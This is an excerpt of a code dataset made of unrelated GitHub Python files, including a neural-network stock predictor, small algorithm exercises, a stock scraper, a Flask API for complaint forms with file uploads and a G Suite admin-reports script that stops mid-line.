[inputs]\n # target for current time-step\n targets = np.array(inputs_list[dat + two_cycle + 1], ndmin = 2)\n # stores the targets for both time-steps considered\n two_cycle_targets.insert(0, targets)\n \n # calculates the first inputs for the first hidden layer\n hidden_inputs = np.dot(self.wih, inputs)\n hidden_outputs = np.array(self.activation_function(hidden_inputs), ndmin = 2)\n output_list.append(hidden_outputs)\n \n # loops through each layer, calculating the outputs for each and storing them\n current_layer = 1\n while current_layer < len(self.wm):\n # calculates the inputs for the next layer, then the outputs through the activation function\n hidden_inputs = np.dot(self.wm[current_layer], output_list[current_layer])\n hidden_outputs = self.activation_function(hidden_inputs)\n print(hidden_outputs)\n\n # appends the new outputs to the output list to be used for the next layer calculation\n output_list.append(np.array(hidden_outputs, ndmin = 2))\n # increments the layer pointer\n current_layer += 1\n\n # the whole output list is appended to a more global storage to be used in backprop later\n two_cycle_outputs.insert(0, output_list)\n\n # the hidden outputs from the first time step are fed into the hidden inputs for the second\n if two_cycle == 0: \n next_hinputs = output_list[-1][-self.nhout :]\n continue \n\n \n\n # Multi-timestep backprop\n for two_cycle in range(2):\n if two_cycle == 0:\n # second step final output\n final_output = two_cycle_outputs[two_cycle][-1]\n # targets, is second step targets and final outputs of the hidden variables, so error is 0 for these \n targets = np.array(np.append(two_cycle_targets[two_cycle], final_output[-self.nhout :]), ndmin = 2)\n output_errors = targets.T - final_output\n follow_through_errors = output_errors[ : ] \n\n else:\n # output errors for first step come from the prior step\n output_errors = np.array(np.append(follow_through_errors[: 5], current_errors[-self.nhout :]), ndmin = 2).T\n \n # current errors variable to make the method more clear\n current_errors = output_errors\n current_layer = 1\n while current_layer < (len(self.wm) + 1):\n\n # current & previous outputs used in updating the weights matricies\n current_outputs = two_cycle_outputs[two_cycle][-current_layer]\n # calculate the hidden errors\n hidden_errors = np.dot(self.wm[-current_layer].T, current_errors)\n\n prev_outputs = two_cycle_outputs[two_cycle][-(current_layer + 1)]\n # updating the current weight matrix\n if two_cycle == 1:\n self.wm[-current_layer] += self.lr * np.dot((current_errors * current_outputs * (1.0 - current_outputs)),\n np.transpose(prev_outputs))\n\n # current errors on the next loop are the current hidden errors\n current_errors = hidden_errors\n # increment the current_layer pointer\n current_layer += 1\n \n pass\n\n \n # predict the neural network\n def predict(self, inputs_list, stepsbehind, stepsahead):\n # list of predictions made given parameters\n predictions = []\n # only making predictions with stepsbehind steps, but also need steps ahead true values for comparisons\n inputs_list = inputs_list[-(stepsbehind + stepsahead): ]\n\n next_hinputs = [0 for i in range(self.nhout)]\n for dat in range(stepsbehind + stepsahead): \n \n # inputs will be previous outputs if dat has parsed through all steps behind\n if dat < stepsbehind:\n # append 0 * the number of hidden inputs to the input list, next_hinputs changes depending on time-step\n inputs = np.array(np.append(inputs_list[dat], next_hinputs), ndmin = 2).T\n else:\n inputs = np.array(next_hinputs, ndmin = 2).T\n print(inputs)\n\n # output list for all layers to be used in backprop\n output_list = [inputs]\n\n # calculates the first inputs for the first hidden layer\n hidden_inputs = np.dot(self.wih, inputs)\n hidden_outputs = np.array(self.activation_function(hidden_inputs), ndmin = 2)\n output_list.append(hidden_outputs)\n \n # loops through each layer, calculating the outputs for each and storing them\n current_layer = 1\n while current_layer < len(self.wm):\n # calculates the inputs for the next layer, then the outputs through the activation function\n hidden_inputs = np.dot(self.wm[current_layer], output_list[current_layer])\n hidden_outputs = self.activation_function(hidden_inputs)\n\n # appends the new outputs to the output list to be used for the next layer calculation\n output_list.append(np.array(hidden_outputs, ndmin = 2))\n # increments the layer pointer\n current_layer += 1\n\n if dat < stepsbehind - 1:\n # the hidden outputs from the first time step are fed into the hidden inputs for the second\n next_hinputs = output_list[-1][-self.nhout :]\n else:\n # all outputs are fed back through to make predictions\n next_hinputs = output_list[-1]\n print(hidden_outputs)\n predictions.append(next_hinputs[: -self.nhout])\n \n return np.array(predictions)\n\n\n\n\n\n\n","repo_name":"Veileihi/Stock_Bot","sub_path":"neural_stock_bot.py","file_name":"neural_stock_bot.py","file_ext":"py","file_size_in_byte":8523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4165901706","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\n# Getting data from file\ndata=np.genfromtxt(r'Salary_Data.csv', delimiter=',')\ndata=np.delete(data,0,axis=0)\n# print (data)\nX=data[:,0]\n# print(np.size(X))\ny=data[:,1]\nX=X.reshape(-1,1)\n# print(X)\n\n#appplying linear Regression\nlinReg=LinearRegression()\nlinReg.fit(X,y)\npre=linReg.predict(X)\n\n#plotting data\nplt.scatter(X,y,c=\"red\")\nplt.plot(X,pre,scalex=True,scaley=True, color='blue')\nplt.xlabel(\"Years of Experience\")\nplt.ylabel(\"Salary\")\nplt.title(\"Linear Regression Model for Salary\")\nplt.show()","repo_name":"opencodeiiita/INTEL-20","sub_path":"TASK-1/Question-1/aawizard.py","file_name":"aawizard.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"811302171","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\nx=int(input())\nfor w in range(x):\n y=int(input())\n a=[]\n for i in range(y):\n a.append(input().split(\" \"))\n b=[]\n for i in range(0,len(a[0])):\n p=[]\n for j in a:\n p.append(j[i])\n b.append(p)\n c=0\n for i in range(0,len(a)):\n for j in range(0,len(a[i])):\n if(i==j):\n c=c+int(a[i][j])\n k=0\n for i in a:\n if(len(i)!=len(set(i))):\n k=k+1\n l=0\n for i in b:\n if(len(i)!=len(set(i))):\n l=l+1\n print(\"Case #\"+str(w+1)+\":\",c,k,l)\n\n","repo_name":"Vedant-S/Codes-VS","sub_path":"Codes/Competitive Programming/Vestigium.py","file_name":"Vestigium.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"31318764394","text":"import re\nimport requests\nimport json\nfrom bs4 import BeautifulSoup\n\n'''\n先爬取东方财富的股票代码,再根据股票代码爬取百度股市通的股票详情\n'''\nclass Spider(object):\n def __init__(self):\n self.headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, br',\n 'Accept-Language': 'zh-CN,zh;q=0.9',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36',\n }\n\n # 页面爬取公共代码\n def getPage(self, url):\n try:\n r = requests.get(url=url, headers=self.headers)\n # 判读页面是否返回正确\n # HttpError -> https://www.jianshu.com/p/159bea26f7b5\n r.raise_for_status()\n # 使用源网站编码\n r.encoding = r.apparent_encoding\n # 返回BeautifulSoup对象\n return BeautifulSoup(r.text, 'html.parser')\n except:\n print('HTTPError 连接错误')\n return None\n\n # 东方财富股票代码号\n def eastMoney(self):\n url = 'http://quote.eastmoney.com/stocklist.html'\n html_data = self.getPage(url)\n # 股票代码容器\n quotesearch = html_data.find_all('div', id='quotesearch')\n # print(quotesearch)\n # 获取代码\n a_list = []\n a_item = map(lambda x: x.find_all('a'), quotesearch)\n for i in list(a_item)[0]:\n # print(i.attrs['href'])\n try:\n if i.attrs['href'] is not None:\n href = i.attrs['href']\n # print(href)\n a_list.append(re.findall(r'[s][hz]\\d{6}', href)[0])\n except:\n # print('获取代码出错')\n # 跳过不符合的项\n continue\n return a_list\n # 根据获取的股票代码抓取百度股市通的股票详情\n def getStockDetails(self, stock_list):\n # def getStockDetails(self):\n '''url = 'https://gupiao.baidu.com/stock/sh000001.html'\n html_data = self.getPage(url)\n \n stock_bets = html_data.find('div', attrs={'class': 'stock-bets'})\n name = stock_bets.find('a', attrs={'class': 'bets-name'})\n stock_data = {}\n stock_data.update({'名称': name.text.strip()})\n stock_data['list'] = []\n # 参数项\n bets_content_col = stock_bets.find('div', attrs={'class': 'bets-col-9'})\n for i in bets_content_col.find_all('dl'):\n _list = {}\n _list['name'] = i.find('dt').text\n _list['value'] = i.find('dd').text\n stock_data['list'].append(_list)\n print(stock_data)'''\n\n \n url = 'https://gupiao.baidu.com/stock/{}.html'\n stock_data = {}\n stock_data['list'] = []\n for i in stock_list:\n html_data = self.getPage(url.format(i))\n # 容错处理\n try:\n if html_data == \"\":\n continue\n # find\n stock_bets = html_data.find('div', attrs={'class': 'stock-bets'})\n name = stock_bets.find('a', attrs={'class': 'bets-name'})\n # 添加\n stock_data.update({'名称': name.text.strip()})\n # 参数项\n bets_content_col = stock_bets.find('div', attrs={'class': 'bets-content'})\n for i in bets_content_col.find_all('dl'):\n _list = {}\n _list['name'] = i.find('dt').text\n _list['value'] = i.find('dd').text\n stock_data['list'].append(_list)\n with open('Stock.txt', 'a', encoding='utf-8') as f:\n # 不进行ascii转码(不设置中文会自动被转为ASCII码)\n f.write(json.dumps(stock_data, ensure_ascii=False) + '\\n')\n except:\n print('有错误')\n continue\n # print(stock_data)\n\n \n # 主函数\n def main(self):\n # self.eastMoney()\n self.getStockDetails(self.eastMoney()[100: 102])\n # self.getStockDetails()\n\nif __name__ == '__main__':\n main = Spider().main()\n","repo_name":"ToWorkit/Python_Reptile","sub_path":"new/股票/spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74668738360","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndef ThreeSquares(x):\n abc = []\n x_ = []\n y_ = []\n z_ = []\n degen = 0\n a = 0\n while a ** 2 <= x:\n b = a\n while b ** 2 <= x:\n c = b\n while c ** 2 <= x:\n if a ** 2 + b ** 2 + c ** 2 == x:\n\n x_.append(a)\n x_.append(b)\n x_.append(c)\n y_.append(degen)\n y_.append(degen)\n y_.append(degen)\n z_.append(1)\n z_.append(2)\n z_.append(3)\n\n degen = degen + 1\n\n c = c + 1\n b = b + 1\n a = a + 1\n if degen == 0:\n return 0, 0\n else:\n return abc, degen, x_, y_, z_\n\n\n# ----------- #\nn = 9998\n# ----------- #\n\nfig = plt.figure()\nax = fig.gca(projection='3d')\n\nax.set_xlabel('Value')\nax.set_ylabel('Degeneracy')\nax.set_zlabel('ABC')\n\ncombos, d, x, y, z = ThreeSquares(n)\nxs = np.asarray(x)\nys = np.asarray(y)\nzs = np.asarray(z)\ni = 0\nfor i in range(d):\n a = i * 3\n new_x = [xs[a], xs[a+1], xs[a+2]]\n new_y = [ys[a], ys[a+1], ys[a+2]]\n new_z = [zs[a], zs[a+1], zs[a+2]]\n ax.plot(new_x, new_y, new_z)\n\nprint(d)\n\nplt.show()\n","repo_name":"benedictsaunders/ThreeSquares","sub_path":"Python/degeneracy_plotter.py","file_name":"degeneracy_plotter.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33897589320","text":"import serial\nser = serial.Serial(\"/dev/ttyUSB0\", 9600)\n\nwhile True:\n # when the Arduino sends an entire string i.e. Serial.println(\"Hello, World!\")\n # Python is able to read the entire string\n print(ser.readline().strip())\n\n# when sending multiple characters\n# Arduino will parse all of the above\nser.write('0123')\n\n# i.e.\n# if (Serial.available()) {\n# int value = (int)(Serial.read()-'0');\n# strip.setPixelColor(value,255,0,0);\n# strip.show();\n# }\n#\n# will show all 4 pixels\n","repo_name":"gabrielwong159/rpi","sub_path":"arduino/arduino_serial.py","file_name":"arduino_serial.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"7231008749","text":"def inputAccount():\n valid_input = False\n while not valid_input:\n account = input(\"Select which account should be used\\n\\n1 - tim.wigton@wigtonco.com\\n2 - tim@murcadom.com\\n\\n\")\n if int(account) == 1:\n account = \"tim.wigton@wigtonco.com\"\n valid_input = True\n elif int(account) == 2:\n account = \"tim@murcadom.com\"\n valid_input = True\n else:\n print(\"invalid input\")\n return account\n","repo_name":"wignition/labelChanger","sub_path":"inputAccount.py","file_name":"inputAccount.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73886537721","text":"import sys\n\n\ndef rl():\n return sys.stdin.readline().strip()\n\n\ndef rn():\n return list(map(int, sys.stdin.readline().strip().split()))\n\n\ndef rln(n):\n l = [None] * n\n for i in range(n):\n l[i] = int(rl())\n return l\n\n\nif __name__ == '__main__':\n\n t = int(input())\n for _ in range(t):\n deg = list(map(int, input().split()))[1::]\n d = int(input())\n k = int(input())\n\n pos = 1\n n = 1\n while pos < k:\n pos += n * d\n if pos > k:\n break\n n += 1\n\n res = 0\n for i in range(len(deg)):\n res += (n ** i) * deg[i]\n\n print(res)\n\n","repo_name":"jaxalo/UVA","sub_path":"Problem Solving Pardigms/Complete Search/Linear scan/UVA927_Integer_Sequence.py","file_name":"UVA927_Integer_Sequence.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34182963500","text":"import codecs\n\nfrom flask_restplus import Resource\nfrom flask import request, send_file, send_from_directory\n# importando configuraciones iniciales\nimport flask_app.settings.LogDefaultConfig\nfrom flask_app.dto.mongo_class.Captcha import Captcha\nfrom flask_app.dto.mongo_class.ConfiguracionGeneral import ConfiguracionMail\nfrom flask_app.dto.mongo_class.Form import Formulario\nfrom flask_app.my_lib.utils import fill_information_usuario, get_files_for, set_max_age_to_response, \\\n fill_timeline_notification\nfrom flask_app.settings import initial_settings as init\nfrom flask_app.api.services.restplus_config import api\nfrom flask_app.api.services.restplus_config import default_error_handler\nfrom flask_app.api.services.Formulario import parsers, serializers as srl\n# importando clases para leer desde MongoDB\nfrom flask_app.dto.mongo_class.FormTemporal import *\nfrom flask_app.my_lib.send_mail.send_mail import *\nfrom flask_app.my_lib.captcha.captcha_util import *\n# configurando logger y el servicio web\nlog = flask_app.settings.LogDefaultConfig.LogDefaultConfig(\"ws_denuncias.log\").logger\nns = api.namespace('formularios', description='Relativas a la gestión de trámites del Comité de Ética de CENACE')\n\n\nser_from = srl.FormSerializers(api)\napi = ser_from.add_serializers()\n\n\n@ns.route('/forma/')\nclass FormularioAPI(Resource):\n\n def get(self, id_forma: str = \"Id de la forma a buscar\"):\n \"\"\" Busca si una forma definitiva aceptada vía correo electrónico \"\"\"\n forma = Formulario.objects(id_forma=id_forma).first()\n if forma is None:\n return dict(success=False, forma=None, msg=\"Información no encontrada\"), 404\n files = get_files_for(id_forma)\n return dict(success=True, forma=forma.to_dict(), files=files, msg=\"Información cargada\"), 200\n\n @api.expect(ser_from.forma)\n def put(self, id_forma: str = \"Id de la forma a buscar\"):\n \"\"\" Edita información de una forma temporal \"\"\"\n request_data = dict(request.json)\n forma = FormularioTemporal.objects(id_forma=id_forma).first()\n if forma is None:\n return dict(success=False, forma=None, msg=\"No se ha encontrado información asociada\"), 404\n forma.update_data(request_data)\n forma.save()\n return dict(success=True, forma=forma.to_dict(), msg=\"Información actualizada\"), 200\n\n\n@ns.route('/forma-temporal/')\nclass FormularioTemporalAPI(Resource):\n\n def get(self, id_forma: str = \"Id de la forma a buscar\"):\n \"\"\" Busca si una forma temporal insertada mediante formulario \"\"\"\n forma = FormularioTemporal.objects(id_forma=id_forma).first()\n if forma is None:\n return dict(success=False, forma=None, msg=\"Información no encontrada\"), 404\n files = get_files_for(id_forma)\n return dict(success=True, forma=forma.to_dict(), files=files, msg=\"Información cargada\"), 200\n\n\n@ns.route('/usuario/')\nclass FormularioUsuarioAPI(Resource):\n\n def get(self, ci: str = \"Cédula del denunciante\"):\n \"\"\" Busca las denuncias existentes para el usuario con CI \"\"\"\n # forma = SRNode.objects(nombre=nombre).first()\n query = {'data.ci': ci}\n forma = FormularioTemporal.objects(__raw__=query).first()\n if forma is None:\n return dict(success=False), 404\n return forma.to_dict(), 200\n\n\n@ns.route('/forma')\nclass FormularioPostAPI(Resource):\n @api.expect(ser_from.forma)\n def post(self):\n \"\"\" Postea una forma en el servidor \"\"\"\n request_data = dict(request.json)\n id_forma = request_data.get(\"id_forma\", None)\n temp_form = FormularioTemporal.objects(id_forma=id_forma).first()\n if temp_form is not None:\n return dict(success=False, forma=None, msg=\"Esta forma ya existe\"), 304\n request_data.pop(\"id_forma\", None)\n forma = FormularioTemporal(data=DataForm(**request_data))\n forma.save()\n return dict(success=True, forma=forma.to_dict(), msg=\"Forma registrada de manera correcta\"), 200\n\n\n@ns.route('/forma-temporal//evidencias')\nclass EvidenciasAPI(Resource):\n @api.response(200, 'Archivo subido correctamente')\n @api.expect(parsers.file_upload)\n def post(self, id_forma):\n \"\"\" Subir archivos de evidencia a la forma (id_forma)\"\"\"\n args = parsers.file_upload.parse_args()\n filename = args['file'].filename\n stream_file = args['file'].stream.read()\n # verificar existencia de folder\n destination = os.path.join(init.FILE_REPO, id_forma)\n if not os.path.exists(destination):\n try:\n os.makedirs(destination)\n except:\n log.info(f\"This file already exists {destination}\")\n # path del archivo a guardar\n file_path = os.path.join(destination, filename)\n if os.path.exists(file_path):\n os.remove(file_path)\n with open(file_path, 'wb') as f:\n f.write(stream_file)\n return dict(success=True, msg=f\" {filename} - This file was upload\"), 200\n\n\n@ns.route('/forma//evidencias/')\nclass EvidenciasFileAPI(Resource):\n\n def get(self, id_forma, file):\n \"\"\" Obtiene un archivo subido al expediente \"\"\"\n form_path = os.path.join(init.FILE_REPO, id_forma)\n file_path = os.path.join(form_path, file)\n if not os.path.exists(file_path):\n return dict(success=False, msg=\"Archivo no encontrado\"), 404\n response = send_from_directory(os.path.dirname(file_path), file, as_attachment=True)\n return set_max_age_to_response(response, 30)\n\n def delete(self, id_forma, file):\n \"\"\" Elimina un archivo subido al expediente \"\"\"\n form_path = os.path.join(init.FILE_REPO, id_forma)\n file_path = os.path.join(form_path, file)\n if not os.path.exists(file_path) or not os.path.isfile(file_path):\n return dict(success=False, msg=\"Archivo no encontrado\"), 404\n os.remove(file_path)\n files = get_files_for(id_forma)\n return dict(success=True, files=files, msg=\"Archivo eliminado\"), 200\n\n\n@ns.route('/captcha/')\nclass CaptchaAPI(Resource):\n def post(self, id):\n \"\"\" Crea un nuevo Captcha \"\"\"\n text, image = gen_captcha(6)\n captcha = Captcha(id_captcha=id,text=text)\n captcha.save()\n return send_file(image, as_attachment=False,\n attachment_filename=f'{id}.png',\n mimetype='image/png')\n\n\n@ns.route('/captcha///verified')\nclass VerifiedCaptchaAPI(Resource):\n def get(self, id, value):\n \"\"\" Verifica si el código ingresado corresponde al código captcha generado \"\"\"\n captcha = Captcha.objects(id_captcha=id).first()\n if captcha is None:\n return dict(success=False, errors=\"No se encontró el captcha en referencia\"), 400\n if captcha.text == value:\n return dict(success=True), 200\n else:\n return dict(success=False), 200\n\n\n@ns.route('/evidencia')\nclass EvidenciaAPI(Resource):\n @api.response(200, 'Archivo subido correctamente')\n @api.expect(parsers.file_upload)\n def post(self):\n \"\"\" Añade archivos de evidencia en la carpeta temporal \"\"\"\n args = parsers.file_upload.parse_args()\n filename = args['file'].filename\n stream_file = args['file'].stream.read()\n # verificar existencia de folder\n destination = os.path.join(init.FILE_REPO, \"temp\")\n if not os.path.exists(destination):\n os.makedirs(destination)\n # path del archivo a guardar\n destination = os.path.join(destination, filename)\n with open(destination, 'wb') as f:\n f.write(stream_file)\n return dict(success=True), 200\n\n\n@ns.route('/mail-temporal/')\nclass mailAPI(Resource):\n def post(self, id_forma):\n \"\"\" Envía mail usando informacion del formulario \"\"\"\n temp_form = FormularioTemporal.objects(id_forma=id_forma).first()\n if temp_form is None:\n return dict(success=False, msg=\"Los datos no han sido ingresados en el Sistema\")\n # read template for notifications:\n html_template_path = os.path.join(init.TEMPLATE_REPO, \"Notification.html\")\n html_str = codecs.open(html_template_path, 'r', 'utf-8').read()\n # filling information:\n html_str = fill_information_usuario(html_str, temp_form, get_files_for(id_forma))\n mail = temp_form.data[\"correo_electronico\"]\n success, msg = send_mail(html_str, \"Notificación CENACE CE\", [mail], init.from_email)\n return dict(success=success, msg=msg), 200 if success else 409\n\n\n@ns.route('')\nclass FormsAPI(Resource):\n def get(self):\n \"\"\" Obtiene todos los trámites ingresados a la plataforma \"\"\"\n result = list()\n for form in Formulario.objects:\n result.append(form.to_dict())\n return dict(success=True, forms=result, msg=\"Lista de trámites\"), 200\n","repo_name":"Borreguin/API-CE","sub_path":"flask_app/api/services/Formulario/endpoints/api_form.py","file_name":"api_form.py","file_ext":"py","file_size_in_byte":9058,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15672629558","text":"# gen some random data for testing\nimport sqlite3\nimport orjson\nimport random\nimport string\nimport time\n\n\nDATA_SIZE = 1_000_000\n\nletter_len = len(string.ascii_letters)\n\ndef random_string():\n start = random.randint(0, letter_len)\n end = random.randint(start, letter_len)\n return string.ascii_letters[start:end]\n\n\n\n\"\"\"\ntest data:\n {\n id(int): {\n name: str\n category: 1|2|3\n },\n ...\n }\n\"\"\"\n\n\ntest_data = {}\n\nfor id in range(DATA_SIZE):\n test_data[str(id)] = {\"name\": random_string(), \"category\": random.randint(1,3)}\n\n\ndef get_time(func, *args, **kwargs):\n start = time.perf_counter()\n func(*args, **kwargs)\n end = time.perf_counter()\n print(f\"{func.__name__}: {end - start}\")\n\n# orjson is really fast\n# get_time(str, test_data)\n# get_time(orjson.dumps, test_data)\n\nwith open(\"test_data.json\", \"wb+\") as fp:\n fp.write(orjson.dumps(test_data))\n\nconnection = sqlite3.connect(\"test_data.db\")\ncursor = connection.cursor()\ncursor.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS \"data\" (\n \"id\" INTEGER UNIQUE,\n \"name\" TEXT,\n \"category\" INTEGER,\n PRIMARY KEY(\"id\")\n);\n\"\"\")\nfor id in test_data:\n name, category = test_data[id].values()\n cursor.execute(\n \"INSERT INTO data (id, name, category) VALUES (?, ?, ?);\", \n (id, name, category),\n )\n\nconnection.commit()\n","repo_name":"StarrFox/code","sub_path":"python/json_vs_sqlite/datagen.py","file_name":"datagen.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2453458549","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nfrom apiclient import discovery\r\nfrom oauth2client import client\r\nfrom oauth2client import tools\r\nfrom oauth2client.file import Storage\r\n\r\nfrom argparse import ArgumentParser, ArgumentDefaultsHelpFormatter, Namespace\r\nfrom argparse import SUPPRESS as AP_SUPPRESS\r\ntry:\r\n import argparse\r\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\r\nexcept ImportError:\r\n flags = None\r\n\r\nimport csv\r\nimport datetime\r\nimport httplib2\r\nimport logging\r\nimport os\r\nimport sys\r\n\r\nscript_name = os.path.basename(os.path.realpath(__file__))\r\nscript_directory = os.path.dirname(os.path.realpath(__file__))\r\nlib_directory = os.path.realpath(os.path.join(script_directory, '../lib'))\r\nif lib_directory not in sys.path:\r\n sys.path.append(lib_directory)\r\n\r\nfrom o_common import ENCODING, OK_STATUS, rest_client\r\nfrom o_common import logging_init, logging_level, get_dns\r\nfrom o_common import arguments_check, fix_name, json_dump, load_namespace\r\n\r\n\r\nlog = logging.getLogger(__name__)\r\n\r\n# If modifying these scopes, delete your previously saved credentials\r\n# at ~/.credentials/appsactivity-python-quickstart.json\r\nSCOPES = 'https://www.googleapis.com/auth/activity ' \\\r\n 'https://www.googleapis.com/auth/drive.metadata.readonly ' \\\r\n 'https://www.googleapis.com/auth/admin.reports.audit.readonly ' \\\r\n 'https://www.googleapis.com/auth/admin.reports.usage.readonly ' \\\r\n 'https://www.googleapis.com/auth/urlshortener ' \\\r\n 'https://www.googleapis.com/auth/cloud-platform'\r\n\r\nCLIENT_SECRET_FILE = 'client_secret.json'\r\nAPPLICATION_NAME = 'Google Suite Activity API Python Quickstart'\r\nSCOPES_URL = SCOPES\r\nTOKEN_COUNT = 1000\r\n\r\nclass ARCEO_VULN(object):\r\n # col in arceo_vulnerability\r\n connector_name = ''\r\n connector_version = ''\r\n connector_id = ''\r\n connector_type = ''\r\n computer_id = ''\r\n computer_name = ''\r\n computer_dns = ''\r\n computer_domain = ''\r\n computer_ip = '' # inet\r\n computer_port = 443 # integer\r\n computer_protocol = 'https'\r\n computer_service = ''\r\n detected_ts = '' # timestamptz\r\n released_ts = '' # timestamptz\r\n name = ''\r\n vendor = 'Google G Suite'\r\n severity = 'low'\r\n cvss = 0.0 # float8\r\n cves = ''\r\n links = ''\r\n viruses = ''\r\n is_error = 0 # boolean DEFAULT false\r\n description = ''\r\n\r\n # clear non-defaults\r\n def clear(self):\r\n self.connector_name = ''\r\n self.connector_version = ''\r\n self.connector_id = ''\r\n self.connector_type = ''\r\n self.computer_id = ''\r\n self.computer_name = ''\r\n self.computer_dns = ''\r\n self.computer_domain = ''\r\n self.computer_ip = '' # inet\r\n self.computer_service = ''\r\n self.detected_ts = '' # timestamptz\r\n self.released_ts = ''\r\n self.name = ''\r\n self.severity = 'low'\r\n self.cvss = 0.0 # float8\r\n self.cves = ''\r\n self.links = ''\r\n self.viruses = ''\r\n self.is_error = 0 # boolean DEFAULT false\r\n self.description = ''\r\n\r\n\r\ndef get_credentials(secret_file):\r\n \"\"\"Gets valid user credentials from storage.)\r\n\r\n If nothing has been stored, or if the stored credentials are invalid,\r\n the OAuth2 flow is completed to obtain the new credentials.\r\n\r\n Returns:\r\n Credentials, the obtained credential.\r\n \"\"\"\r\n home_dir = os.path.expanduser('~')\r\n credential_dir = os.path.join(home_dir,'.credentials')\r\n\r\n if not os.path.exists(credential_dir):\r\n os.makedirs(credential_dir)\r\n credential_path = os.path.join(credential_dir,'appsactivity-python-quickstart.json')\r\n\r\n store = Storage(credential_path)\r\n credentials = store.get()\r\n\r\n if not credentials or credentials.invalid:\r\n flow = client.flow_from_clientsecrets(secret_file, SCOPES)\r\n flow.user_agent = APPLICATION_NAME\r\n if flags:\r\n credentials = tools.run_flow(flow, store, flags)\r\n else: # Needed only for compatibility with Python 2.6\r\n credentials = tools.run(flow, store)\r\n print('Storing credentials to ' + credential_path)\r\n return credentials\r\n\r\n\r\ndef write_results(output_base, db_vluns):\r\n output_json = './data/'+output_base + '.json'\r\n output_csv = './data/'+output_base + '.out'\r\n\r\n log.info('start writing output file: %s ...', [output_json, output_csv])\r\n\r\n with open(output_json, 'wb') as f:\r\n f.write(json_dump(db_vluns, sort_keys=False))\r\n\r\n with open(output_csv, 'wb') as f:\r\n if not db_vluns:\r\n return\r\n\r\n columns = db_vluns[0].keys()\r\n writer = csv.DictWriter(f, fieldnames=columns, extrasaction='ignore')\r\n writer.writeheader()\r\n\r\n for vlun in db_vluns:\r\n # if isinstance(v, datetime):\r\n # vlun[k] = v.isoformat()\r\n # if isinstance(v, (list, tuple)):\r\n # vlun[k] = ','.join(v)\r\n writer.writerow(vlun)\r\n\r\n log.info('finish writing output file: %s', [output_json,output_csv])\r\n\r\n\r\ndef map_out_to_arceo_vunlnerability(rows,v):\r\n rows.append({\r\n 'connector_name': v.connector_name.lower(),\r\n 'connector_version':v.connector_version.lower(),\r\n 'connector_id': v.connector_id,\r\n 'connector_type': v.connector_type.lower(),\r\n 'computer_id': v.computer_id,\r\n 'computer_name': v.computer_name.lower(),\r\n 'computer_dns': v.computer_dns,\r\n 'computer_domain': v.computer_domain.lower(),\r\n 'computer_ip': v.computer_ip, # inet\r\n 'computer_port': v.computer_port, # integer\r\n 'computer_protocol':v.computer_protocol.lower(),\r\n 'computer_service': v.computer_service.lower(),\r\n 'detected_ts': v.detected_ts, # timestamptz\r\n 'released_ts': v.released_ts, # timestamptz\r\n 'name': v.name.lower(),\r\n 'vendor': v.vendor,\r\n 'severity': v.severity.lower(),\r\n 'cvss': v.cvss, # float8\r\n 'cves': v.cves,\r\n 'links': v.links,\r\n 'viruses': v.viruses,\r\n 'is_error': v.is_error, # boolean DEFAULT false\r\n 'description': v.description.lower(),\r\n })\r\n\r\ndef gsuite_adminreportsAPI(args):\r\n\r\n credentials = get_credentials('client_secret_activity.json')\r\n\r\n log.info('visit this OAuth consent URL to allow access: %s', credentials.token_info_uri)\r\n http = credentials.authorize(httplib2.Http())\r\n\r\n # Creates a Google Admin SDK Reports API service object\r\n log.info('Building an discovery service for reports_v1')\r\n service = discovery.build('admin', 'reports_v1', http=http)\r\n log.info('Built service object for: %s', service._baseUrl)\r\n\r\n # defaults values for col in arceo_vulnerability\r\n a = ARCEO_VULN()\r\n\r\n # 1 Request Admin reports. - for ref see - https://developers.google.com/admin-sdk/reports/v1/reference/activities/list\r\n log.info('Fetch the last {} days of admin events'.format(args.token_count))\r\n results = service.activities().list(userKey='all', applicationName='admin',\r\n maxResults=args.token_count).execute()\r\n activities = results.get('items', [])\r\n if not activities:\r\n log.info('NO GSuite admin events found.')\r\n else:\r\n log.info('*** Admin ***')\r\n rows = []\r\n\r\n for activity in activities:\r\n log.info(activity)\r\n a.clear()\r\n a.connector_name = activity['id']['applicationName']\r\n a.connector_name = activity['id']['applicationName']\r\n a.connector_version = activity['actor']['profileId']\r\n a.connector_id = activity['id']['uniqueQualifier']\r\n # The admin activity report's activity events types are:\r\n # APPLICATION_SETTINGS, CALENDAR_SETTINGS, CHAT_SETTINGS, CHROME OS_SETTINGS, 